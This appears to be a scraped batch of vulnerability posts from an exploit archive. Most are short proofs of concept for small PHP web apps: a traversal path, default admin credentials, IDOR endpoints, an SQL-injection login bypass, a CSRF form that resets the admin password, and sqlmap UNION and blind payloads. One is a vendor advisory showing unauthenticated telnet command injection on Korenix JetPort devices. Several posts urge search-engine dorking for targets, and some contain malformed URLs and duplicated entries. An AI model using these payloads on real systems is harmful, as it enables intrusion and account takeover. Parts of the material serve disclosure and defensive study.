<pre><code>=============================================================================================================================================<br />| # Title : E-Commerce Site using PHP PDO v1.0 Directory traversal Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/12287/e-commerce-site-using-php-pdo.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : /bower_components/bootstrap/dist/css/../../Gemfile<br /><br />[+] https://www/127.0.0.1/demo/site/login<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Covid-19 Directory on Vaccination System v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/15244/design-and-implementation-covid-19-directory-vacination.html |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin123<br /><br />[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Bhojon restaurant management system v2.8 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.bdtask.com/restaurant-management-system.php#live_demo |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.<br /><br />[+] use payload : /dashboard/autoupdate<br /><br />[+] https://www/127.0.0.1/tacoturkco/dashboard/autoupdate<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : AccPack Khanepani v1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : http://webpay.com.np/#Product |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following HTML code modifies the admin information.<br /><br />[+] Go to the line 5. Set the target site link Save changes and apply . <br /><br />[+] infected file : cms/user/modify.php.<br /><br />[+] save code as poc.html <br /><br />[+] payload : <br /><br /></head><br /><body><br /> <div class="container"><br /> <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div><br /> <form action="https://tssclahanorgnp/cms/user/modify.php" method="POST" enctype="multipart/form-data"><br /> <div hidden="true"><br /> <input type="text" name="id" id="id" value="1"><br /> </div><br /> <div><br /> <label for='email'>Email</label><input type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz"><br /> </div><br /> <div><br /> <label for='password'>Password</label><input type="text" class="form-control" name='password' id='password' type='password' value="123456"><br /> </div><br /> <tr><br /> <div><br /> <label for='status'>Status</label><br /> <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label><br /> <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label><br /> <br /> </div> <br /> <div style='height:80'><br /> <input type='submit' value='Submit'><input type='reset' Value='Reset'><br /> </div><br /> </form><br /> </div><br /><br /></body><br /></html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : AccPack Cop v1.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/#Product |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Direct Object Reference : leads to the creation of a new file in the list.<br /><br />[+] use payload : cms/gallery/insert.php<br /><br />[+] http://127.0.0.1/jamiatulamanepalorgnp/cms/gallery/insert.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : AccPack Buzz v1.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/#Product |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Direct Object Reference : leads to the creation of a new file in the list.<br /><br />[+] use payload : cms/gallery/insert.php<br /><br />[+] http://127.0.0.1/jamiatulamanepalorgnp/cms/gallery/insert.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>CyberDanube Security Research 20240805-0<br />-------------------------------------------------------------------------------<br /> title| Multiple Vulnerabilities in JetPort Series<br /> product| Korenix JetPort Series<br /> vulnerable version| 1.2<br /> fixed version| None<br /> CVE number| CVE-2024-7395, CVE-2024-7396, CVE-2024-7397<br /> impact| High<br /> homepage| https://www.korenix.com/<br /> found| 2024-04-01<br /> by| S. Dietz (Office Vienna)<br /> | CyberDanube Security Research<br /> | Vienna | St. Pölten<br /> |<br /> | https://www.cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />"Korenix Technology, a Beijer group company within the Industrial Communication<br />business area, is a global leading manufacturer providing innovative, market-<br />oriented, value-focused Industrial Wired and Wireless Networking Solutions.<br />With decades of experiences in the industry, we have developed various product<br />lines [...].<br /><br />Our products are mainly applied in SMART industries: Surveillance, Machine-to-<br />Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer<br />base covers different Sales channels, including end-customers, OEMs, system<br />integrators, and brand label partners. [...]"<br /><br />Source: https://www.korenix.com/en/about/index.aspx?kind=3<br /><br /><br />Vulnerable versions<br />-------------------------------------------------------------------------------<br />Korenix JetPort 5601v3 / v1.2<br /><br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) Insufficient Authentication (CVE-2024-7395)<br />The configuration service on port 600/tcp doesnt require authentication to be<br />used. This allows an attacker to change the password or other critical<br />information.<br /><br />2) Plaintext Communication (CVE-2024-7396)<br />The communication of the configuration service is transmitted in plain text.<br />An attacker could use this information to sniff passwords or other critical<br />information.<br /><br />3) Unauthenticated Command Injection (CVE-2024-7397)<br />An attacker with network access an can execute arbitrary commands as root user<br />via the management service on port 600/tcp.<br /><br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) Insufficient Authentication (CVE-2024-7395)<br />The management software JetPort Commander is used as an frontend for the telnet<br />service on 600/tcp. While it is possible to set a password, the passwords gets<br />sent to the software in cleartext and gets validated on the client software<br />rather than on the device. An attacker can bypass the management software by<br />using telnet to directly connect to the port. This allows him to reconfigure<br />the device including passwords and access controls.<br /><br />$ telnet 192.168.122.76 600<br />Trying 192.168.122.76...<br />Connected to 192.168.122.76.<br />Escape character is '^]'.<br />-> setpassword poc<br /><br />target:/$ cat /tmp/com2ip.conf<br />version:1.2.0<br />model:JetPort5601v3<br />name:JetPort5601v3-DEFAULT<br />serialno:0000000000000000<br />password:poc<br />switchmode:redundant<br />network:static:192.168.122.76:192.168.10.1:192.168.10.1<br /><br /><br />2) Plaintext Communication (CVE-2024-7396)<br />The management service uses telnet as protocol. We used tcpdump to inspect the<br />traffic during a password change. The new password (newpass) is readable during<br />transmission.<br /><br /># sudo tcpdump -i virbr0 dst port 600 -X<br />14:17:25.461197 IP 192.168.122.240.49600 > 192.168.122.76.600: Flags [P.], seq 0:21, ack 13, win 16422, length 21<br />      0x0000: 4500 003d 16a7 4000 8006 6d86 c0a8 7af0 E..=..@...m...z.<br />      0x0010: c0a8 7a4c c1c0 0258 522b 6096 12eb 337d ..zL...XR+`...3}<br />      0x0020: 5018 4026 76bd 0000 7365 7470 6173 7377 P.@&v...setpassw<br />      0x0030: 6f72 6420 6e65 7770 6173 730d 0a ord.newpass..<br /><br /><br />3) Unauthenticated Remote Code Execution (CVE-2024-7397)<br />The management service on port 600/tcp is used to configure JetPort devices<br />over the network. An attacker can inject arbitrary commands in multiple<br />settings options. The binary ser2net receives the data via the telnet<br />protocol and translates it to arguments for system() calls. For our PoC we<br />used the setsntp option to create the file /tmp/pwned.<br /><br />$ telnet 192.168.122.76 600<br />Trying 192.168.122.76...<br />Connected to 192.168.122.76.<br />Escape character is '^]'.<br />-> setsntp pool.ntp.org$(touch /tmp/pwned),123,Asia/Taipei,1<br />OK<br />-><br /><br />target:/$ ls -rtlha /tmp/<br />drwxrwxr-x 17 root 0 1.0k Apr 4 10:41 ..<br />-rw-r--r-- 1 root 0 4 Apr 4 12:28 thttpd.pid<br />-rw-r--r-- 1 root 0 712 Apr 4 12:29 com2ip.conf<br />-rw-r--r-- 1 root 0 0 Apr 4 12:33 pwned<br />-------------------------------------------------------------------------------<br /><br />The vulnerabilities were manually verified on an emulated device by using the<br />MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).<br /><br /><br />Solution<br />-------------------------------------------------------------------------------<br />None. Device is End-of-Life.<br /><br /><br />Workaround<br />-------------------------------------------------------------------------------<br />Limit the access to the device and place it within a segmented network.<br /><br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />CyberDanube recommends customers from Korenix to remove the device from their<br />network topology.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />2024-04-08: Contacting Beijer Electronics Group via cs@beijerelectronics.com.<br />2024-05-07: Received confirmation that the issue is beeing looked into.<br />2024-06-10: Contact stated that the product is considered EoL and will no<br /> longer receive security updates.<br />2024-06-10: Confirm receipt and telling them that we will publish the<br /> advisory after our 90-days deadline.<br />2024-08-05: Publication of the Advisory.<br /><br /><br />Web: https://www.cyberdanube.com<br />Twitter: https://twitter.com/cyberdanube<br />Mail: research at cyberdanube dot com<br /><br />EOF Sebastian Dietz / @2024<br /><br /></code></pre>
<pre><code>## Titles: eduAuthorities-1.0 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 07/29/2024<br />## Vendor: https://www.mayurik.com/<br />## Software:<br />https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The editid parameter appears to be vulnerable to SQL injection attacks. The<br />payloads 15750083 or 4189=04189 and 58006253 or 7709=7710 were each<br />submitted in the editid parameter. These two requests resulted in different<br />responses, indicating that the input is being incorporated into a SQL query<br />in an unsafe way. Note that automated difference-based tests for SQL<br />injection flaws can often be unreliable and are prone to false positive<br />results. You should manually review the reported requests and responses to<br />confirm whether a vulnerability is actually present.<br />Additionally, the payload (select*from(select(sleep(20)))a) was submitted<br />in the editid parameter. The application took 20011 milliseconds to respond<br />to the request, compared with 3 milliseconds for the original request,<br />indicating that the injected SQL command caused a time delay.The attacker<br />can get all information from the system by using this vulnerability!<br /><br />STATUS: HIGH- Vulnerability<br /><br /><br />[+]Exploits:<br />- SQLi Multiple:<br />```mysql<br />---<br />Parameter: #1* (URI)<br /> Type: boolean-based blind<br /> Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP<br />BY clause (EXTRACTVALUE)<br /> Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-8488<br />OR EXTRACTVALUE(2229,CASE WHEN (2229=2229) THEN 2229 ELSE 0x3A END)#<br />UiVZfrom(select(sleep(3)))a)<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (random number) - 3 columns<br /> Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-2962<br />UNION ALL SELECT<br />8651,8651,CONCAT(0x7176627a71,0x664c6c4a72786a466c676743684468646d676e646d476f535a4f4a64694375516a54746d52426253,0x7171766b71),8651#from(select(sleep(3)))a)<br />---<br />```<br /><br />## Reproduce:<br />[href](https://www.patreon.com/posts/eduauthorities-1-109562178)<br /><br />## More:<br />[href](<br />https://www.nu11secur1ty.com/2024/08/eduauthorities-10-multiple-sqli.html)<br /><br />## Time spent:<br />00:37:00<br /><br /><br /></code></pre>
<pre><code>======================================================================================================================================================<br />| # Title : Concert Ticket Reservation System v1.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://download-media.code-projects.org/2020/04/Concert_Ticket_Ordering_System__IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip |<br />======================================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : user & pass = ' or 0=0 ##<br /><br />[+] Panel : http://127.0.0.1/ConcertTicketReservationSystem-master/profile.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Computer Laboratory Management System v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin123<br /><br />[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>